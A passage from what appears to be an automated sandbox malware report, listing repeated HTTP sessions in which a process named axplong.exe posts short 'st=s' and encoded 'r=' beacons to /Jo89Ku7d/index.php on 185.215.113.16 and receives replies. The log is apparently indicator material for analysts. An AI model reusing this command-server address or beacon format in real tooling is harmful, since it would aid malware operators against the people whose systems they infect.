                    Date: Thu, 26 Sep 2024 23:43:19 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:19.557147980 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:19.789901018 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:19 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    15192.168.2.849725185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:19.965173006 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:20.678016901 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:20 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:20.678956985 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:20.901180983 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:20 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    16192.168.2.849726185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:21.025661945 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:21.744201899 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:21 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:21.745699883 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:21.972769976 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:21 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    17192.168.2.849727185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:22.094440937 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:22.805089951 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:22 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:22.881247044 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:23.116976023 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:23 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    18192.168.2.849728185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:23.238768101 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:23.948216915 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:23 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:23.950522900 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:24.180466890 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:24 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    19192.168.2.849729185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:24.303957939 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:25.049860954 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:24 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:25.051582098 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:25.285926104 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:25 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    20192.168.2.849730185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:25.423085928 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:26.151310921 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:26 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:26.152304888 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:26.388048887 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:26 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    21192.168.2.849732185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:26.504379034 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:27.223661900 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:27 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:27.224919081 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:27.454963923 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:27 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    22192.168.2.849734185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:27.566574097 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:28.272741079 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:28 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:28.280612946 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:28.505650997 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:28 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    23192.168.2.849735185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:28.678603888 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:29.337007046 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:29 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:29.338445902 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:29.569871902 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:29 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    24192.168.2.849736185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:29.698048115 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:30.447463036 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:30 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:30.448374033 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:30.687792063 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:30 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    25192.168.2.849737185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:30.801863909 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:31.491599083 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:31 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:31.588385105 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:31.813420057 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:31 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    26192.168.2.849738185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:32.013638973 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:32.726602077 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:32 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
